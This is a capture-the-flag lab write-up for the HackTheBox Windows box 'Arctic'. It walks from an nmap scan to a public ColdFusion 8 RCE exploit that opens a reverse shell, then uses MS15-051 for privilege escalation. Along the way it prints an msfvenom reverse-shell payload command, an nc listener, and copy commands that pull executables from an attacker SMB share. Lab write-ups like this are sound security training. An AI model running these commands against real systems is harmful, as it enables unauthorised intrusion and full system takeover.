An easy Windows box from HackTheBox, get initial access via known RCE, then elevate privileges with a kernel exploit.


Running the usual nmap

sudo nmap -sC -sV -oA nmap/init
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

nmap doesn’t know what on port 8500, looking around, it could be ColdFusion Macromedia HTTP server

Looking at it in the browser, find that it is in fact this ancient server that takes 30 seconds to respond to requests

Navigating through the directories, also find out it is version 8.0


Then in searchsploit, there are a few RCE results, we can pick the python one

searchsploit coldfusion

Adobe ColdFusion 8 - Remote Command Execution (RCE)


Then downloading it into the working directory

searchsploit -m cfm/webapps/

Then edit the file to change the lhost to the KALI_IP, and run the exploit to grab a reverse shell



Executing the payload...
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49353
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Running systeminfo then run wesng to try for some privilege escalation


Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          20/9/2022, 12:39:59 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     6.143 MB
Available Physical Memory: 4.983 MB
Virtual Memory: Max Size:  12.285 MB
Virtual Memory: Available: 11.143 MB
Virtual Memory: In Use:    1.142 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)

Can see that there are no hotfixes applied, so we can use whatever exploit we want to privesc, I opted for MS15-051

I uploaded the exe to the victim, and as well as a reverse shell executable (made with msfvenom)

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9001 -f exe > rev.exe 

Set up a reverse listener

rlwrap nc -lnvp 9001

And upload the executables using the smbserver script again share .

Then on the victim, go to the TEMP directory and download them

c:\windows\TEMP> copy \\\share\ms15-051x64.exe ms15-051x64.exe

c:\windows\TEMP> copy \\\share\rev.exe rev.exe

And run the exploit

c:\windows\TEMP> ms15-051x64.exe rev.exe

Check back on the listener

listening on [any] 9001 ...


nt authority\system

And have root!